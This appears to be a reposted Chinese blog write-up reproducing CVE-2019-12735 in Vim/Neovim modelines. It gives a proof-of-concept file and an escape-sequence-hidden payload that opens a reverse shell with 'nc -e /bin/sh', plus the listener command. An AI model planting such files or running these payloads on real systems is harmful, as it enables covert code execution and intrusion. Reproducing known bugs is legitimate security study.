长亭百川云 - 文章详情

文本编辑器Vim/Neovim任意代码执行漏洞(CVE-2019-12735) - PaperPen

博客园 - PaperPen

49

2024-07-19

受影响版本:

Vim < 8.1.1365, Neovim < 0.3.6

**前提:**开启modeline

0x01 开启modeline

在你的home下的.vimrc文件中增加一行:

set modeline

0x02 Poc

创建文件poc.txt,内容为

:!uname -a||" vi:fen:fdm=expr:fde=assert\_fails("source\\!\\ \\%"):fdl=0:fdt="

输入命令 $vim poc.txt

系统将会执行uname -a

0x03 反弹shell

创建shell.txt,内容如下

\\x1b\[?7l\\x1bSNothing here.\\x1b:silent! w | call system(\\'nohup nc 127.0.0.1 9999 -e /bin/sh &\\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert\_fails(\\'set\\\\ fde=x\\\\ \\\\|\\\\ source\\\\!\\\\ \\\\%\\') fdl=0: \\x16\\x1b\[1G\\x16\\x1b\[KNothing here."\\x16\\x1b\[D \\n

开启两个终端:

一个输入命令 $nc -lvvp 9999

另一个命令为 $vim shell.txt

成功反弹shell

参考链接:

https://github.com/numirias/security/blob/master/doc/2019-06-04\_ace-vim-neovim.md

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2